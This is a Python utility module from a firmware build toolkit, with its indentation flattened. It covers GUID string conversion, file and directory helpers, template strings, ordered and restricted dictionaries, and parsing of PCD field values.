## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
if not GlobalData.gGuidCFormatPattern.match(GuidValue):
return ''
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory is None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory is None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if not IsBinaryFile:
Content = Content.replace("\n", os.linesep)
if os.path.exists(File):
try:
if Content == open(File, "rb").read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
try:
Fd = open(File, "wb")
Fd.write(Content)
Fd.close()
except IOError as X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
return True
## Make a Python object persistent on file system
#
# @param Data The object to be stored in file
# @param File The path of file to store the object
#
def DataDump(Data, File):
Fd = None
try:
Fd = open(File, 'wb')
pickle.dump(Data, Fd, pickle.HIGHEST_PROTOCOL)
except:
EdkLogger.error("", FILE_OPEN_FAILURE, ExtraData=File, RaiseError=False)
finally:
if Fd is not None:
Fd.close()
## Restore a Python object from a file
#
# @param File The path of file stored the object
#
# @retval object A python object
# @retval None If failure in file operation
#
def DataRestore(File):
Data = None
Fd = None
try:
Fd = open(File, 'rb')
Data = pickle.load(Fd)
except Exception as e:
EdkLogger.verbose("Failed to load [%s]\n\t%s" % (File, str(e)))
Data = None
finally:
if Fd is not None:
Fd.close()
return Data
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = P.Guids.keys()
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = [x for x in P.Guids if x not in P._PrivateGuids]
if CName in GuidKeys:
return P.Guids[CName]
return None
## Get Protocol value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def ProtocolValue(CName, PackageList, Inffile = None):
for P in PackageList:
ProtocolKeys = P.Protocols.keys()
if Inffile and P._PrivateProtocols:
if not Inffile.startswith(P.MetaFile.Dir):
ProtocolKeys = [x for x in P.Protocols if x not in P._PrivateProtocols]
if CName in ProtocolKeys:
return P.Protocols[CName]
return None
## Get PPI value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def PpiValue(CName, PackageList, Inffile = None):
for P in PackageList:
PpiKeys = P.Ppis.keys()
if Inffile and P._PrivatePpis:
if not Inffile.startswith(P.MetaFile.Dir):
PpiKeys = [x for x in P.Ppis if x not in P._PrivatePpis]
if CName in PpiKeys:
return P.Ppis[CName]
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = ''
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return self.String
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String += "".join(S.Instantiate(Dictionary) for S in SectionList)
else:
self.String += AppendString
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
# for avoiding deadloop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress charaters
# @param CloseMessage The string printed after progress charaters
# @param ProgressChar The charater used to indicate the progress
# @param Interval The interval in seconds between two progress charaters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag is None:
Progressor._StopFlag = threading.Event()
## Start to print progress charater
#
# @param OpenMessage The string printed before progress charaters
#
def Start(self, OpenMessage=None):
if OpenMessage is not None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread is None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress charater
#
# @param CloseMessage The string printed after progress charaters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage is not None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag is not None:
Progressor._StopFlag.set()
if Progressor._ProgressThread is not None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
## A dict which can access its keys and/or values orderly
#
# The class implements a new kind of dict which its keys or values can be
# accessed in the order they are added into the dict. It guarantees the order
# by making use of an internal list to keep a copy of keys.
#
class sdict(IterableUserDict):
## Constructor
def __init__(self):
IterableUserDict.__init__(self)
self._key_list = []
## [] operator
def __setitem__(self, key, value):
if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, value)
## del operator
def __delitem__(self, key):
self._key_list.remove(key)
IterableUserDict.__delitem__(self, key)
## used in "for k in dict" loop to ensure the correct order
def __iter__(self):
return self.iterkeys()
## len() support
def __len__(self):
return len(self._key_list)
## "in" test support
def __contains__(self, key):
return key in self._key_list
## indexof support
def index(self, key):
return self._key_list.index(key)
## insert support
def insert(self, key, newkey, newvalue, order):
index = self._key_list.index(key)
if order == 'BEFORE':
self._key_list.insert(index, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
elif order == 'AFTER':
self._key_list.insert(index + 1, newkey)
IterableUserDict.__setitem__(self, newkey, newvalue)
## append support
def append(self, sdict):
for key in sdict:
if key not in self._key_list:
self._key_list.append(key)
IterableUserDict.__setitem__(self, key, sdict[key])
def has_key(self, key):
return key in self._key_list
## Empty the dict
def clear(self):
self._key_list = []
IterableUserDict.clear(self)
## Return a copy of keys
def keys(self):
keys = []
for key in self._key_list:
keys.append(key)
return keys
## Return a copy of values
def values(self):
values = []
for key in self._key_list:
values.append(self[key])
return values
## Return a copy of (key, value) list
def items(self):
items = []
for key in self._key_list:
items.append((key, self[key]))
return items
## Iteration support
def iteritems(self):
return iter(self.items())
## Keys interation support
def iterkeys(self):
return iter(self.keys())
## Values interation support
def itervalues(self):
return iter(self.values())
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
value = None
if key in self._key_list:
value = self[key]
self.__delitem__(key)
elif len(dv) != 0 :
value = kv[0]
return value
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
key = self._key_list[-1]
value = self[key]
self.__delitem__(key)
return key, value
def update(self, dict=None, **kwargs):
if dict is not None:
for k, v in dict.items():
self[k] = v
if len(kwargs):
for k, v in kwargs.items():
self[k] = v
## Dictionary with restricted keys
#
class rdict(dict):
## Constructor
def __init__(self, KeyList):
for Key in KeyList:
dict.__setitem__(self, Key, "")
## []= operator
def __setitem__(self, key, value):
if key not in self:
EdkLogger.error("RestrictedDict", ATTRIBUTE_SET_FAILURE, "Key [%s] is not allowed" % key,
ExtraData=", ".join(dict.keys(self)))
dict.__setitem__(self, key, value)
## =[] operator
def __getitem__(self, key):
if key not in self:
return ""
return dict.__getitem__(self, key)
## del operator
def __delitem__(self, key):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="del")
## Empty the dict
def clear(self):
for Key in self:
self.__setitem__(Key, "")
## Return value related to a key, and remove the (key, value) from the dict
def pop(self, key, *dv):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="pop")
## Return (key, value) pair, and remove the (key, value) from the dict
def popitem(self):
EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="popitem")
## Dictionary using prioritized list as key
#
class tdict:
_ListType = type([])
_TupleType = type(())
_Wildcard = 'COMMON'
_ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', '*', 'PLATFORM']
def __init__(self, _Single_=False, _Level_=2):
self._Level_ = _Level_
self.data = {}
self._Single_ = _Single_
# =[] operator
def __getitem__(self, key):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
elif self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
FirstKey = self._Wildcard
if self._Single_:
return self._GetSingleValue(FirstKey, RestKeys)
else:
return self._GetAllValues(FirstKey, RestKeys)
def _GetSingleValue(self, FirstKey, RestKeys):
Value = None
#print "%s-%s" % (FirstKey, self._Level_) ,
if self._Level_ > 1:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None:
for Key in self.data:
Value = self.data[Key][RestKeys]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey][RestKeys]
if Value is None and self._Wildcard in self.data:
#print "Value=None"
Value = self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
if FirstKey in self.data:
Value = self.data[FirstKey]
if Value is None:
for Key in self.data:
Value = self.data[Key]
if Value is not None: break
else:
if FirstKey in self.data:
Value = self.data[FirstKey]
elif self._Wildcard in self.data:
Value = self.data[self._Wildcard]
return Value
def _GetAllValues(self, FirstKey, RestKeys):
Value = []
if self._Level_ > 1:
if FirstKey == self._Wildcard:
for Key in self.data:
Value += self.data[Key][RestKeys]
else:
if FirstKey in self.data:
Value += self.data[FirstKey][RestKeys]
if self._Wildcard in self.data:
Value += self.data[self._Wildcard][RestKeys]
else:
if FirstKey == self._Wildcard:
for Key in self.data:
Value.append(self.data[Key])
else:
if FirstKey in self.data:
Value.append(self.data[FirstKey])
if self._Wildcard in self.data:
Value.append(self.data[self._Wildcard])
return Value
## []= operator
def __setitem__(self, key, value):
KeyType = type(key)
RestKeys = None
if KeyType == self._ListType or KeyType == self._TupleType:
FirstKey = key[0]
if len(key) > 1:
RestKeys = key[1:]
else:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
else:
FirstKey = key
if self._Level_ > 1:
RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
if FirstKey in self._ValidWildcardList:
FirstKey = self._Wildcard
if FirstKey not in self.data and self._Level_ > 0:
self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
if self._Level_ > 1:
self.data[FirstKey][RestKeys] = value
else:
self.data[FirstKey] = value
def SetGreedyMode(self):
self._Single_ = False
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetGreedyMode()
def SetSingleMode(self):
self._Single_ = True
if self._Level_ > 1:
for Key in self.data:
self.data[Key].SetSingleMode()
def GetKeys(self, KeyIndex=0):
assert KeyIndex >= 0
if KeyIndex == 0:
return set(self.data.keys())
else:
keys = set()
for Key in self.data:
keys |= self.data[Key].GetKeys(KeyIndex - 1)
return keys
def IsFieldValueAnArray (Value):
Value = Value.strip()
if Value.startswith(TAB_GUID) and Value.endswith(')'):
return True
if Value.startswith('L"') and Value.endswith('"') and len(list(Value[2:-1])) > 1:
return True
if Value[0] == '"' and Value[-1] == '"' and len(list(Value[1:-1])) > 1:
return True
if Value[0] == '{' and Value[-1] == '}':
return True
if Value.startswith("L'") and Value.endswith("'") and len(list(Value[2:-1])) > 1:
return True
if Value[0] == "'" and Value[-1] == "'" and len(list(Value[1:-1])) > 1:
return True
return False
def AnalyzePcdExpression(Setting):
Setting = Setting.strip()
# There might be escaped quote in a string: \", \\\" , \', \\\'
Data = Setting
# There might be '|' in string and in ( ... | ... ), replace it with '-'
NewStr = ''
InSingleQuoteStr = False
InDoubleQuoteStr = False
Pair = 0
for Index, ch in enumerate(Data):
if ch == '"' and not InSingleQuoteStr:
if Data[Index - 1] != '\\':
InDoubleQuoteStr = not InDoubleQuoteStr
elif ch == "'" and not InDoubleQuoteStr:
if Data[Index - 1] != '\\':
InSingleQuoteStr = not InSingleQuoteStr
elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair += 1
elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
Pair -= 1
if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
NewStr += '-'
else:
NewStr += ch
FieldList = []
StartPos = 0
while True:
Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
if Pos < 0:
FieldList.append(Setting[StartPos:].strip())
break
FieldList.append(Setting[StartPos:Pos].strip())
StartPos = Pos + 1
return FieldList
def ParseDevPathValue (Value):
if '\\' in Value:
Value.replace('\\', '/').replace(' ', '')
Cmd = 'DevicePath ' + '"' + Value + '"'
try:
p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
except Exception as X:
raise BadExpression("DevicePath: %s" % (str(X)) )
finally:
subprocess._cleanup()
p.stdout.close()
p.stderr.close()
if err:
raise BadExpression("DevicePath: %s" % str(err))
Size = len(out.split())
out = ','.join(out.split())
return '{' + out + '}', Size
def ParseFieldValue (Value):
if isinstance(Value, type(0)):
return Value, (Value.bit_length() + 7) / 8
if not isinstance(Value, type('')):
raise BadExpression('Type %s is %s' %(Value, type(Value)))
Value = Value.strip()
if Value.startswith(TAB_UINT8) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith(TAB_UINT16) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith(TAB_UINT32) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith(TAB_UINT64) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith(TAB_GUID) and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
TmpValue = GuidStructureStringToGuidString(Value)
if not TmpValue:
raise BadExpression("Invalid GUID value string %s" % Value)
Value = TmpValue
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = "'" + uuid.UUID(Value).get_bytes_le() + "'"
except ValueError as Message:
raise BadExpression(Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
Value = Value.strip().strip('"')
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
try:
Value = int(Value, 16)
except:
raise BadExpression("invalid hex value: %s" % Value)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) / 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) / 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
# there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
# ValueList: A List contain fields described above
# IsValid: True if conforming EBNF, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
